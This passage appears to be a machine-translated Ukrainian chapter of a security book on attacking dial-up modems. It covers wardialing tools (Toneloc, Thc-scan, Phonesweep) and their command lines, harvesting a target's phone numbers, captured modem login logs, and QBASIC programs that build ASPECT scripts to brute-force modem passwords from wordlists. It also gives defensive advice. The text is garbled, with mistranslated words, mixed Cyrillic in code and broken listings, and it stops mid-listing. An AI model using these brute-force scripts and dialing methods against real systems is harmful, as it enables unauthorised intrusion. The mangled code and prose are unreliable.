Уразливість видалених з'єднань, PBX, VOICEMAIL і віртуальних приватних мереж

Зазвичай організації менше всього уваги приділяють старим забутим телефонним лініям. Ці дроти, що опоясали весь світ, сьогодні забуті. У цьому розділі буде показано, як старенький модем з пропускною спроможністю 9600 Кбіт в секунду може поставити на коліна мережевого Голіафа з капшуком системним захистом.
Може здатися, що автори вирішили почати розділ, присвячений мережевим атакам, із застарілої інформації про хакинге аналогових видалених з'єднань. Не дивлячись на повсюдне розповсюдження Internet, звичайні телефонні мережі PSTN (Public Switched Telephone Network) сьогодні достатньо часто використовуються для зв'язку з домашніми і навіть службовими комп'ютерами. Тому сенсаційні історії про злом вузлів Internet меркнуть перед прозаїчнішими розповідями про вторгнення через видалені з'єднання, оскільки останні є більш руйнівними і простіше здійснимими.
Насправді для великих компаній набагато більшу небезпеку представляють погано інвентаризовані модемні лінії, чим захищені брандмауерами шлюзи Internet. Згаданий вище експерт в області безпеки компанії At&t Біл Чесвік (Bill Cheswick) охарактеризував брандмауер як панцир черепахи. Насправді, навіщо атакувати неприступний брандмауер, коли можна пробратися безпосередньо до "тіла" цільової системи через погано захищений сервер видаленого доступу? Мабуть, захист видалених з'єднань — найбільш важливий аспект побудови лінії кругової оборони.
Хакинг видалених з'єднань виконується по класичній схемі: спочатку виконується попередній збір інформації, потім — сканування, інвентаризація і, нарешті, атака. В більшості випадків цей процес можна автоматизувати за допомогою традиційних хакреських засобів, що отримали назву сканерів телефонних номерів (demon dialer) або програм автопрозвона (wardialer). По суті, ці засоби програмно встановлюють видалене з'єднання з великою кількістю телефонних номерів, реєструють ті з них, по яких встановлюються модемні з'єднання, намагаються ідентифікувати систему на іншому кінці телефонної лінії і по можливості реєструватися в системі, підібравши ім'я користувача і пароль. Якщо для цього потрібне спеціальне програмне забезпечення або конкретні знання про систему, установка з'єднання може виконуватися уручну.
Вибір сканера телефонних номерів — камінь спотикання як для зловмисників, так і для легальних фахівців з пошуку незахищених видалених з'єднань. У цьому розділі ми розглянемо дві найбільш популярні програми такого типу, які можна безкоштовно завантажити з Internet (Toneloc і Thc-scan), а також комерційний продукт Phonesweep від компанії Sandstorm Enterprises.
Після обговорення цих програм будуть розглянуті прийоми, вживані проти виявлених сканерами телефонних номерів систем уручну або в автоматичному режимі, зокрема внутрішні телефонні мережі компаній (мережі РВХ) або системи голосової пошти (voicemail).
На завершення ми торкнемося іншого аспекту систем видаленого доступу і опишемо віртуальні приватні мережі VPN (Virtual Private Networking). Хоча такі мережі є достатньо захищеними і на них покладаються основні надії в області розвитку корпоративних мереж, питання безпеки для них — не дозвільний. До теперішнього часу відомий лише один випадок злому таких мереж, який і буде розглянутий в цьому розділі разом із загальними міркуваннями про перспективи цієї життєво важливої технології.

Попередній збір даних про телефонні номери

Хакинг видалених з'єднань починається з визначення діапазону телефонних номерів, з якими працюватиме сканер. Справжні хакери зазвичай вибирають компанію-жертву і збирають інформацію про використовуваних нею телефонних номерах з самих різних джерел. Нижче будуть описані деякі механізми для обмеження сфери розповсюдження такої інформації.
Насамперед хакери вивчають телефонні довідники. Багато компаній продають компакт-диски з телефонними довідниками, якими можна скористатися для злому видалених з'єднань. Визначивши основний телефонний номер, зломщики зазвичай "досліджують" схожі з ним номери. Наприклад, якщо відомо, що основний номер компанії Acme Corp. — 555-555-1212, то для сканера телефонних номерів хакер задасть діапазон 555-555-хххх, щоб перевірити все 10000 схожих телефонних номерів. За наявності декількох модемів таку кількість номерів можна перепробувати за декілька днів за допомогою майже будь-якої програми-сканера.
Ще один спосіб отримання інформації про телефонні номери — подзвонити на місцеву АТС і спробувати дізнатися номери "з перших вуст" необачних службовців. Це хороший спосіб отримання номерів, що не афішуються, вживаних для видалених з'єднань і центрів даних, в яких префікс зазвичай відрізняється від префікса основного телефонного номера. Багато телефонних компаній на вимогу клієнта заносять цю інформацію в розряд секретною і не розголошують її без надання пароля, проте відома безліч випадків порушення таких домовленостей і розголошування інформації.
Окрім телефонних довідників, джерелом подібних відомостей є Web-узлы корпорації. Багато компаній, втративши пильність від свободи розповсюдження інформації в Internet, публікують списки своїх телефонних номерів на Web-узлах. Цього не варто робити, якщо тільки це не обумовлено характером діяльності.
Телефонні номери можна знайти в найнесподіваніших місцях Internet. Одне з найбільш небезпечних місцеположень в сенсі накопичення інформації вже згадувалося в розділі 1, проте варто повернутися до нього ще раз. Відомості про контактні телефони, а також іншу технічну і адміністративну інформацію про компанії, представлені в Internet, можна отримати з реєстраційної бази даних імен Internet, підтримуваної центром INTERNIC (відомою також як Network Solutions), через інтерфейс whois за адресою http://www.networksolutions.com/cgi-bin/whois/whois/. Ось результат пошуку по ключовому слову acme. com, що містить як відкриту, так і закриту інформацію з бази даних INTERNIC.

Registrant: Acme, Incorporated (ACME-DOM)
Princeton Rd. Hightstown, NJ 08520
US Domain Name: ACME.COM
Administrative Contact: Smith,john (JSOOOO) jsmith@acme.COM
555-555-5555 (FAX) 555-555-5556
Technical Contact, Zone Contact: ANS Hostmaster (AH-ORG)
hostmaster@ans.NET
(800)555-5555

Усунете просочування інформації

Кращим захистом проти попереднього збору інформації по телефону є запобігання просочуванню інформації. Звичайно ж, для забезпечення можливості ділових контактів необхідно роздавати телефонні номери компанії, але дуже обережно. Зв'яжіться зі своїм оператором і погоджуйте з ним перелік відкритих телефонних номерів, список осіб, що мають доступ до закритої інформації, а також пароль для отримання яких-небудь закритих даних. Організовуйте групу по усуненню просочування інформації з числа співробітників відділу інформатизації, яка стежитиме за тим, щоб закриті телефонні номери не розповсюджувалися через Web-узлы, служби каталогів, сервери видаленого доступу і так далі Зв'яжіться з компанією INTERNIC і "почистите" контактну інформацію для зони Internet. І нарешті, попередите користувачів, що телефон не завжди друг, тому потрібно бути проявляти обережність в розмовах з незнайомцями і не розголошувати ніякої закритої інформації.

Сканери телефонних номерів

Процес підбору телефонних номерів багато в чому визначається використовуваними для цього засобами. Тому далі будуть охарактеризовані конкретні продукти, такі як Toneloc, Thc-scan і Phonesweep, Проте спочатку приведемо деякі загальні міркування.

Апаратні засоби

При підборі телефонних номерів питання вибирання апаратних засобів не менш важливе, чим вибір програмного забезпечення. Нижче ми розглянемо два безкоштовні програмні засоби, призначених для операційної системи DOS і таких, що здобули незаслужену репутацію тих, що важко настроюються. Проте для налаштування будь-якої програми автопрозвона потрібне тонке знання СОМ-ПОРТОВ комп'ютера, а на деяких апаратних конфігураціях ці програми можуть не працювати взагалі, наприклад на переносному комп'ютері з інтерфейсом PCMCIA. Звичайно ж, не варто переоцінювати вимоги до апаратних засобів: типовий персональний комп'ютер з двома стандартними СОМ-ПОРТАМІ і послідовною платою для додавання ще два цілком підійде для цих цілей. В той же час, для професійної системи автопрозвона можна встановити багатопортову карту Digitboard, що дозволяє підключити до системи від 4 до 8 модемів одночасно.
Апаратні засоби — головний чинник, що визначає швидкість і ефективність. Сканери телефонних номерів можуть бути надмірно обережними: часто перед набором наступного номера вони витримують паузу в декілька секунд, щоб не упустити потенційну мету із-за перешкод на лінії або інших чинників. Якщо період очікування складає 45-60 секунд, то програма автопрозвона на кожен дзвінок витрачає приблизно хвилину. Шляхом нескладних арифметичних обчислень можна визначити, що для перевірки діапазону в 10000 номерів одному модему знадобиться сім повних діб. Очевидно, що додавання кожного нового модему істотно прискорює процес — чотири модеми працюють удвічі швидше, ніж два. Оскільки підбір номерів можна виконувати тільки в непіковий час (див. наступний розділ), то ніж більше модемів задіяно в цій операції — тим краще.
Значний вплив на швидкість процесу надає також тип модему. Сучасні модеми, як правило, голосові. Визначення голосу дозволяє при підборі номери відразу ж зареєструвати номер телефону як "голосовий", відключитися і продовжувати дозвон по наступному номеру, не чекаючи закінчення заданого інтервалу часу (45-60 секунд). Оскільки значна частка телефонних номерів виділена для голосових ліній, то їх виявлення значно прискорює процес підбору номера телефону для модемних з'єднань. У документації до обох програм Thc-scan і Phonesweep рекомендується використовувати модем USR Courier, як найбільш надійний. Крім того, в документації по Thc-scan рекомендується також використовувати модем Zyxel Elite, а в документації по Phonesweep — Zyxel U-1496e fax/voice.

Легалізація діяльності

Разом з питаннями вибору апаратної платформи для підбору номерів потенційні зломщики серйозно розглядають питання законності своєї діяльності. У деяких країнах заборонено послідовно набирати велике число номерів, і телефонні компанії уважно стежать за дотриманням цієї вимоги, а часто їх устаткування просто не дозволяє цього робити. Звичайно ж, всі програми, що розглядаються тут, розбивають заданий діапазон номерів на випадкові інтервали, щоб уникнути порушення таких вимог, але це все ж таки не гарантує від попадання в "чорний список". Тому фахівці, що займаються подібною діяльністю на законних підставах, повинні легалізувати свої дії і отримати письмовий дозвіл від компанії-замовника на проведення такого тестування. У цьому документі необхідно вказати діапазон сканованих телефонних номерів, щоб покласти відповідальність за вихід з діапазону на ту, що виконує підбір номера організацію.
У угоді необхідно також вказати час доби, коли компанія-замовник вважає за краще виконувати тестування. Як уже згадувалося, сканування телефонних номерів в робочий час може негативно відбитися на ефективності роботи компанії, тому таку діяльність зазвичай відкладають на пізній вечір або нічний час.

Пам'ятаєте, що сканування телефонних номерів з включеним ідентифікатором CALLERLD, що означає можливість автоматичного визначення номера, рівнозначно передачі візитної картки по кожному з номерів, що набирають вами. Багатократне повторення дзвінків з одного джерела викличе підозру у цільової компанії, тому варто відключити режим автоматичного визначення номера на своїй телефонній лінії (звичайно ж, якщо у вас є дозвіл на подібну діяльність, то це не критично). Не слід забувати і тому, що при дзвінках по номерах з префіксом 800 номер що дзвонив фіксується у будь-якому випадку незалежно від статусу CALLERLD, оскільки в цій ситуації розмова оплачується стороною, що відповідає.

Вартість телефонних переговорів

І нарешті, не забувайте про те, що підбір номерів видалених цільових організацій оплачується за міжміським тарифом телефонних переговорів. Тому приготуйтеся до отримання значних рахунків за телефонні переговори і заздалегідь погоджуйте питання їх оплати із замовником.
У наступних розділах будуть детально розглянуті питання налаштування кожного програмного засобу, щоб читачі змогли легко скористатися цими програмами. Проте в книзі будуть описані далеко не всі можливості цих програм.

Програмне забезпечення

Оскільки сканування телефонних номерів зазвичай виконується вночі протягом невеликих інтервалів часу, то важливою вимогою до відповідних програм є можливість гнучкого налаштування графіка роботи і запам'ятовування вже відсканованих номерів. Безкоштовні програми Toneloc і Thc-scan регулярно зберігають результати своєї роботи у файлах даних, забезпечуючи тим самим можливість продовження роботи після подальшого перезапуску. Крім того у них є певні засоби для завдання часу почала і закінчення роботи протягом однієї доби. Проте для виконання тривалих операцій сканування протягом декількох днів користувач повинен вважатися на можливості операційної системи по плануванню виконання завдань або написати спеціальний сценарій. Програма Phonesweep дозволяє повністю автоматизувати режим роботи.
Може здатися, що автори упереджено відносяться до програм Toneloc і Thc-scan, проте вони прагнуть бути об'єктивними. Звичайно, комерційна програма Phonesweep значно полегшить життя консультантам по безпеці, яким необхідно отримати максимальний результат ціною мінімальних зусиль. Можливості цієї програми відповідають її ціні, тому не варто відмовлятися і від послуг безкоштовних програм Toneloc і Thc-scan. При регулярній інтенсивній роботі Phonesweep себе окупає, проте не має сенсу платити гроші, якщо аудит доводиться виконувати лише раз на півроку.

Програма Toneloc

Одній з перших і найбільш популярних програм телефонного сканування є утиліта Toneloc компанії Minor Threat&mucho Maas (назва Toneloc розшифровується як Tone Locator). Цю програму можна знайти на вузлі компанії, а також на безлічі хакреських вузлів в Internet. Подібно багатьом програмам-номеронабирачам, Toneloc працює під управлінням DOS (або у вікні DOS операційної системи Win 9x або NT), а також з емулятором DOS в UNIX. Протягом багатьох років ця утиліта була ефективним засобом для хакерів і консультантів по безпеці. На жаль, творці Toneloc не стежать за оновленням своєї програми, і ніхто із співтовариства фахівців з безпеки не приймав участі в її розробці. Тому для оцінки захищеності Web-узла краще використовувати більш робастную програму Thc-scan.
Програму Toneloc легко встановити і застосовувати для базових операцій телефонного сканування, проте використання розширених можливостей цієї програми вимагає деяких навиків. Спочатку з командного рядка необхідно запустити просту утиліту TLCFG, що виконує запис основних параметрів конфігурації модему у файл TL.CFG, Toneloc, що перевіряється при запуску (при цьому мають бути встановлені порт СОМ, адреса порту введення-виводу і номер переривання). Вікно програми TLCFG.EXE показано на мал. 9.1.
Після цього з командного рядка можна запустити саму програму Toneloc, вказавши діапазон сканованих телефонних номерів, ім'я файлу даних для запису результатів і будь-які інші опції в наступному форматі.

Toneloc [Файлданних] /м:[Маска] /r:[Діапазон]
/X:[Іськмаська] /d:[Іськдіапазон]
/З:[Коїфіг] /#:[Число] /s:[Времяначала] /е:[Времяеаверш]
/Н:[Годинник] /т /к
[Файлданних] - файл для зберігання даних (можливо, маска)
[Маска] - Маска для телефонних номерів у форматі 555-хххх
[Діапазон] - діапазон телефонних номерів у форматі 5000-6999
[Іськмаська} - маска для виключення з сканування у форматі 1ххх
[Іськдіапазон] - діапазон для виключення з сканування у форматі 2500-2699
[Конфіг] - використовуваний файл конфігурації
[Число] - кількість виконуваних дзвінків у форматі 250
[Времяначала]- час почала сканування у форматі 9:30р
[Времязаверш]- час завершення сканування у форматі 6:45а
[Годинник] - максимальне число годинника сканування у форматі 5:30
(перекриває [Времязаверш])
/Т = Tones, /к = Carriers (перекривають дані файлу конфігурації).

Програма Thc-scan

Слабкі сторони утиліти Toneloc компенсує програма Thc-scan, створена членом хакреської групи The Hacker's Choice з Німеччини Ван Хаузером (van Hauser) (http://www.infowar.co.uk/thc/). Подібно Toneloc, утиліта Thc-scan теж настроюється і запускається в операційній системі DOS, у вікні DOS Win 9x або з консолі Windows NT, а також з використанням емулятора Dos під UNIX.

Мал. 9.1. Використання програми TLCFG.EXE дм введення конфігураційних параметрів модему, вживаною утилітою Toneloc

Мал. 9.2. Утиліта Toneloc в процесі сканування великого числа телефонних номерів у пошуках інших модемів

Перед використанням утиліти Thc-scan спочатку за допомогою програми TS-CFG необхідно згенерувати файл конфігурації (. CFG). Ця утиліта конфігурації має ширші можливості, ніж програма TLCFG для Toneloc. Більшість параметрів конфігурації достатньо прості, але для нестандартного налаштування буде потрібно вичерпні знання СОМ-ПОРТОВ. Основні параметри конфігурації перераховані в наступній таблиці

Порт СОМ	Номер переривання	Порт введення-виводу
1	4	3F8
2	3	2F8
3	4	Зе8
4	3	2Е8

Для визначення цих параметрів застосовується утиліта MOD-DET, включена в комплект постачання Thc-scan (на повідомлення Windows про помилки можна не обертати уваги), результат роботи якої виглядає таким чином.

MODEM DETECTOR v2.00 (c) 1996,98 by van Hauser/thc
<vh@ reptile.rug.ac.be>
Get the help screen with : MOD-DET.EXE ?
Identifying Options...
Extended Scanning : NO
Use Fossil Driver : NO
(Fossil Driver not present)
Slow Modem Detect : YES
Terminal Connect : NO
Output Filename : <none>
Autodetecting modems connected to COM 1 to COM 4 ...
COM 1 - None Found
COM 2 - Found! (Ready)
[Irq: 3 | Baseadress: $2F8]
COM 3 - None Found
COM 4 - None Found
1 Modem(s) found.

Мал. 9.3. Сканування телефонних номерів за допомогою утиліти Thc-scan

Установка режиму сканування виконується уручну за допомогою ключів /s і /е, задаючих час почала і закінчення процесу відповідно. Для повторення цього процесу щодня потрібно використовувати вбудовані засоби планування завдань операційної системи, наприклад команду AT служби Scheduler системи Windows NT. Автори книги зазвичай записують параметри запуску Thc-scan в простій командний файл, який потім викликається програмою AT Scheduler. При плануванні графіка роботи утиліти THC-SCAN.EXE необхідно пам'ятати, що відповідний файл конфігурації . CFG обов'язково повинен знаходитися в поточному каталозі, якщо не задана опція /!. Оскільки служба Scheduler запускає команди з каталога %systemroot%, для файлу конфігурації утиліти THC-SCAN.EXE необхідно задати абсолютний шлях, як показано в наступному прикладі.
Приведемо приклад командного файлу thc.bat.

@@echo off
rem Make sure thc-scan.exe is in path
rem absolute path to .cfg file must be specified with /! switch if run
from AT scheduler
rem if re-running а scan, first change to directory with appropriate .DAT
file and delete /p: argument
C:\thc-scan\bin\thc-scan.EXE test /m:555-xxxx /r:0000-9999
/!:C:\thc-scan\bin\thc-scan.CFG /p:test /f /3:20:00 /e:6:00

at 7:58p /interactive /every:1 C\:thc-scan\bin\thc.bat

^~^~^~^~^~^M^~^M?^M^~help^M^~^~^~guest^M^~guest^М^~INFO^M^MLO

Програма Phonesweep

Якщо, на ваш погляд, використання утиліти Thc-scan вимагає дуже великих зусиль, то вам підійде програма Phonesweep. Цю програму поширює компанія Sandstorm Enterprises (http://www.sandstorm.net). Питанням установки і використання безкоштовних програм телефонного сканування було приділено достатньо багато уваги. Розповідь про Phonesweep буде значно коротша, оскільки практично все зрозуміло з самого інтерфейсу користувача (мал. 9.4).
Основними перевагами Phonesweep є простій графічний інтерфейс, автоматичне планування завдань, можливість проникнення в систему, одночасна підтримка декількох модемів і витончена звітність. Для кожного модему задається діапазон номерів (профіль) . Поточна версія програми підтримує до чотирьох модемів. За допомогою прапорців Business Hours, Outside Hours і Weekends утиліту Phonesweep легко набудувати для використання в робочий час, неробочий годинник і вихідні, як показано на мал. 9.5. Конкретний годинник робочого часу задається у вкладці Options>time. Утиліта Phonesweep безперервно виконуватиме сканування у вказаний період часу (звичайно це неробочий час або вихідні, що задаються прапорцями Outside Hours і Weekends) до тих пір, поки не буде перевірений весь діапазон.
Утиліта Phonesweep розрізняє 205 різних типів пристроїв видаленого доступу (їх повний список приводиться за адресою http://www.sandstorm.net/phoneswep/ sysids.shtml). Вона виконує ідентифікацію, порівнюючи текстові або бінарні рядки, що отримуються як відгук модему, з базою даних відомих відгуків. Якщо відгук модему настроювався уручну, то утиліта Phonesweep його не розпізнає. Щоб забезпечити ідентифікацію всіх можливих систем, потрібно включити в звіт всі відгуки всіх можливих модемів, а потім проаналізувати цей список уручну.

Мал. 9.4. Графічний інтерфейс утиліти Phonesweep значно перевершує можливості інтерфейсу безкоштовних програм і включає безліч засобів, що підвищують ефективність і що полегшують використання

Мал. 9.5. Утиліта Phonesweep дозволяє легко настроювати графік роботи

Окрім виявлення стандартних модемів, утиліта Phonesweep дозволяє реалізовувати типові атаки проти них. У текстовому файлі bruteforce.txt, розташованому в каталозі додатку, міститься перелік імен користувачів і паролів, які передаються у відповідь на запрошення модему. Якщо з'єднання розривається, утиліта Phonesweep знову набирає номер і пробує скористатися наступним варіантом відгуку, поки не буде вичерпаний весь список (використовуючи цю утиліту для тестування захищеності свого сервера видаленого доступу, остерігайтеся можливості блокування облікового запису). Одне тільки цей засіб коштує грошей, витрачених на покупку Phonesweep, оскільки дозволяє автоматизувати операції. які зазвичай виконуються уручну (див. наступний розділ).
Ще однією важливою перевагою утиліти Phonesweep є вбудована база даних SQL для реєстрації результатів сканування. Завдяки її наявності відпадає необхідність проглядання текстових файлів уручну або приведення даних з різних форматів до єдиного формату електронних таблиць (що доводиться робити при використанні безкоштовних програм). Тут є лише один шаблон звіту, проте він дуже витончений, містить дійсно корисну інформацію в табличному вигляді, а також можливість додавання в звіт відгуків ідентифікованих модемів (додаток А) і всього списку телефонних номерів (додаток В) у форматі RTF. Фрагмент звіту утиліти Phonesweep приведений на мал. 9.6.
Звичайно, основною відмінністю між Phonesweep і безкоштовними програмами є ціна. Під час написання цієї книги існували дві версії програми Phonesweep: Phonesweep Basic, що підтримує один модем і до 800 номерів на профіль вартістю $980 (вартість додаткової підтримки цієї версії протягом року складає $196), і Phonesweep Plus, що підтримує до 4 модемів і 10000 номерів на кожен профіль вартістю $2800 (вартість додаткової підтримки цієї версії протягом року складає $560). Для захисту від неліцензійного копіювання програми використовується апаратна заглушка, що підключається до паралельного порту, без якої програма не працює. Враховуючи вартість зусиль, витрачених на установку, налаштування і обробку результатів безкоштовних програм, ціна $2800 виглядає не так страхітливо.

Мал. 9.6. Невеликий фрагмент звіту утиліти Phonesweep одночасно демонструє рівень деталізації і узагальнення результатів єдиного вбудованого шаблону звіту

Цікаві результати порівняння програм Phonesweep і Thc-scan, отримані, із зацікавленого джерела — від компанії Sandstorm Enterprises, Inc., можна знайти за адресою http: //geek-girl. com/bugtraq/1998_4/0770 .html.
Але який би засіб ми ні вилай, важливо розуміти, що ми хочемо отримати у результаті. Про це буде розказано в наступному розділі.

Способи проникнення в систему через модем

Сканування телефонних номерів переслідує мета виявити потенційні крапки для подальшого вторгнення в систему через модемне з'єднання, проте найчастіше для визначення ступеня уразливості видаленого з'єднання потрібний уважний аналіз звітів. Наприклад, з наступного фрагмента файлу CARRIERS . LOG, що згенерував утилітою Thc-scan, видно типові відгуки модемів. Скорочено цей файл декілька подредактірован. Подібні дані містяться і в додатку А звіту утиліти Phonesweep.

23-05-1997 14:57:50 Dialing... 95552851
CONNECT 57600
Нр995-400:_
Expected а HELLO command. (CIERR 6057)
23-05-1997 20:08:39 Dialing... 95552349
CONNECT 57600
@ Userid:
Password?
Login incorrect
23-05-1997 21:48:29 Dialing... 95552329
CONNECT 57600
Welcome to 3com Total Control Hiper ARC (ТМ)
Networks That Go The Distance (ТМ)
login:
Password:
Login Incorrect
23-05-1997 21:42:16 Dialing... 95558799
CONNECT 57600
._Please press <Enter>..._I
Pjack Smith_jack SMITH
[CARRIER LOST AFTER 57 SECONDS]

CONNECT 57600
Нр995-400: HELLO FIELD.SUPPORT
PASSWORD» Telesup

Доморослий спосіб: примітивне написання сценаріїв

Після отримання результатів сканування телефонних номерів потрібно систематизувати їх в так звані домени (domain). Як вже наголошувалося, неоціниму допомогу в цьому надасть досвід роботи з різними типами серверів видалених з'єднань і операційних систем. Вибір системи для подальшого проникнення залежить від безлічі чинників, зокрема від того, скільки часу хакер готовий присвятити своїм експериментам, яка смуга пропускання є в його розпорядженні, а також від його інтуїції і професіоналізму в написанні сценаріїв.
Першим важливим кроком на шляху систематизації результатів в цілях тестування є установка з'єднань з виявленими модемами. При цьому потрібно постаратися визначити характеристики з'єднання, щоб потім зуміти згрупувати з'єднання в домени для тестування. Модемне з'єднання можна визначити по декількох істотних ознаках, які і треба постаратися виявити. Приведемо загальний перелік таких ознак.

•  Наявність інтервалу очікування або порогового числа спроб.
•  Після перевищення порогового значення з'єднання більше не використовується.
•  З'єднання доступне тільки в певний годинник.
•  Допустимість коректних припущень про рівень аутентифікації: тобто наявність або відсутність пароля.
•  Унікальність методу ідентифікації, зокрема за принципом запит/відгук (наприклад, з використанням ідентифікаторів захисту (Security ID).
•  Можливість визначення максимального числа символів у відгуку або паролі.
•  Правомочність припущень про наявність спеціальних або алфавітно-цифрових символів в полі пароля або ідентифікаторі користувача.
•  Можливість отримання додаткової інформації при введенні різних стандартних комбінацій клавіш, таких як <Ctrl+c>, <Ctri+z> <?> і тому подібне
•  Наявність ідентифікаційних маркерів або їх зміна з моменту перших спроб проникнення, а також інформація, що міститься в них. Це може виявитися корисним при вгадуванні бракуючої інформації або при вирішенні питань соціальної інженерії.

1. ЛДП	Легко вгадувані і часто використовувані паролі для ідентифікації (вгадати їх допоможе досвід)
2. Одинарна ідентифікація, необмежене число спроб	Системи з одним типом пароля або ідентифікатора користувача. Модем не відключається після заданого числа невдалих спроб установки з'єднання
3. Одинарна ідентифікація, обмежене число спроб	Системи з одним типом пароля або ідентифікатора користувача. Модем відключається після заданого числа невдалих спроб установки з'єднання
4. Подвійна ідентифікація, необмежене число спроб	Системи з двома типами механізмів аутентифікації, наприклад з використанням ідентифікатора користувача і пароля. Модем не відключається після заданого числа невдалих спроб установки з'єднання
5. Подвійна ідентифікація, обмежене число спроб	Системи з двома типами механізмів аутентифікації, наприклад з використанням ідентифікатора користувача і пароля. Модем відключається після заданого числа невдалих спроб установки з'єднання

В цілому чим нижче в списку знаходиться домен, тим складніше проникнути в систему, що відноситься до нього, і тим більше складні сценарії потрібно для цього застосовувати. Розглянемо ці домени докладніше.

Легко доступний плід

Для проникнення в систему, що відноситься до цього домена, потрібний мінімум зусиль. Якщо хакер удачливий — його неминуче чекає успіх. Для проникнення в систему не потрібно писати ніяких сценаріїв — потрібно лише вгадати ідентифікатор користувача або пароль. У книзі не можна перерахувати всі типові ідентифікатори і паролі. Вгадати цю інформацію допоможе досвід і інтуїція. Хорошою відправною крапкою в цьому процесі може послужити ідентифікація підпису. У таблиці. 10.3 наступного розділу приводиться корисний список, з якого можна почати подальші дослідження. Проте яким би списком не скористався читач, головне — швидко перевірити всі вживані за умовчанням варіанти і у разі невдачі перейти до наступного типу домена.

Одинарна ідентифікація, неофаніченноє число спроб

Це перший серйозний домен (ЛДП не в рахунок), який часто найважче ідентифікувати. Річ у тому, що багато систем, які, на перший погляд, належать цьому домену (лістинг 9.1 А), після введення коректного ідентифікатора вимагають повторної аутентифікації (лістинг 9.1 Би). Приклад системи, що дійсно відноситься до цієї категорії, наводиться в лістингу 9.2. Ця система використовує один механізм аутентифікації і допускає необмежене число спроб установки з'єднання.
Лістинг 9.1а. Приклад системи, яка, на перший погляд, відноситься до першого домена, але міняє свою поведінку після введення коректного ідентифікатора користувача або пароля

Xx-jul-xx 09:51:08 91ХХХ5551234
З: CONNECT 9600/arq/v32/lapm
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:
@ Userid:

Xx-jul-xx 09:55:08 91ХХХ5551234
З: CONNECT 9600/arq/v32/lapm
@ Userid: lanroverl
Password: xxxxxxxx

Xx-jul-xx 03:45:08 91ХХХ5551235
З: CONNECT 9600/arq/v32/lapm
Enter Password: Invalid Password.
Enter Password: Invalid Password.
Enter Password: Invalid Password.
Enter Password: Invalid Password.
Enter Password: Invalid Password.

OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS tl
PRINT #2, "proc main"
PRINT #2, "dial
DATA " + Chr$(34)+ "5551235" + Chr$(34)
DO UNTIL EOF(l)
LINE INPUT #1, in$
ins = Ltrim$(in$)+ "ЛМ"
PRINT #2, "waitfor " + Chr$(34)+ "
Enter Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ ins + Chr$(34)
LOOP
PRINT #2, "endproc"

apple
applel
apple2
applepie
applepies
applepiesl
applepies2
applicate
applicates
application
applicationl
applonia
applonial

Оскільки сценарій призначений для підбору паролів, перед початком його виконання потрібно відкрити файл журналу реєстрації подій. Тоді весь процес роботи сценарію фіксуватиметься у файлі. Пізній вміст файлу журналу можна проаналізувати і визначити правильний пароль. На перший погляд, може здатися, що журнал реєстрації зовсім не потрібний. Досить просто виконувати сценарій до успішної спроби (отримання коректного пароля). Проте це неможливо, оскільки заздалегідь не можна визначити, що відбудеться після введення коректного пароля, тобто не можна сформулювати умову успішної спроби. Якщо ж відомо, до якого результату повинен привести введення коректного пароля, то у файлі сценарію на мові ASPECT можна використовувати умову WAITFOR і задати відповідну умову. При такому підході залишається менше шансів для випадковостей. Автори є прихильниками журналів реєстрації. Хоча такі журнали складно аналізувати — їх легко створювати. При цьому, звичайно, передбачається, що додаткові відомості про з'єднання відсутні. Ті, хто працював консультантом по безпеці або аудитором і співробітничав з людьми, що знають характеристики видалених з'єднань своїх організацій, можуть використовувати зовсім інші підходи.

Одинарна ідентифікація, обмежене число спроб

Для проникнення в систему, що відноситься до другого типу доменів, потрібний дещо більше часу, оскільки в сценарій потрібно додати нові елементи. Приклад роботи такої системи приведений в лістингу 9.3. Нескладно відмітити невеликі відмінності в поведінці цій і розглянутої вище системи першого типу. У даному прикладі після третьої спроби установки з'єднання з'являється повідомлення АТНО. Це типова послідовність символів, що означає розривши з'єднання для модемів Hayes. Значить, дане з'єднання розривається після трьох невдалих спроб аутентифікації. Число спроб може варіюватися, проте в даному прикладі буде показано, як відновити з'єднання при його розриві після X (у даному прикладі 3-х) невдалих спроб. Для цього потрібно додати невеликий фрагмент коди в розглянутий вище сценарій. Такий приклад міститься в лістингу 9.4. Тут робиться три спроби вгадати пароль, а потім з'єднання встановлюється знову і процес повторюється.
Лістинг 9.3. Приклад поведінки системи, що відноситься до другого типу домена

Xx-jul-xx 03:45:08 91ХХХ5551235 С:connect 9600/arq/v32/lapm
Enter Password: Invalid Password.
Enter Password:
Invalid Password.
Enter Password:
Invalid Password.
ATHO

OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
DO UNTIL EOF(l) PRINT #2, "dial DATA " + Chr$(34)
+ "5551235" + Chr$(34)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+ "^m"
PRINT #2, "waitfor " + Chr$(34)+ "
Enter Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+ "^м"
PRINT #2, "waitfor " + Chr$(34)+ "
Enter Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LINE INPUT #1, in$
in$ - Ltrim$(in$)+ "^м"
PRINT #2, "waitfor " + Chr$(34)+ "
Enter Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LOOP
PRINT #2, "endproc"

Подвійна ідентифікація, необмежене число спроб

До третього типу доменів часто відносяться системи, які, на перший погляд, можна прийняти за системи першого домена. Проте для проникнення в систему третього домена потрібно вгадати не тільки ідентифікатор користувача, але і пароль. Тому проникнення в таку систему займає більше часу, чим в системи з розглянутих вище доменів. Сценарій проникнення в таку систему зазвичай складніший, оскільки вимагає передачі не одній, а двох коректних рядків. При цьому можливі значно більше помилок. Такий сценарій нагадує розглянуті вище приклади. Приклад поведінки системи, що відноситься до третього домена, приведений в лістингу 9.5, а програма на мові QBASIC для створення сценарію ASPECT — в лістингу 9.6.
Лістинг 9.5, Приклад поведінки системи, що відноситься до третього типу домена

Xx-jcl-xx 09:55:08 91ХХХ5551234
З: CONNECT 9600/arq/v32/lapm
Userr.ame: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx

OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
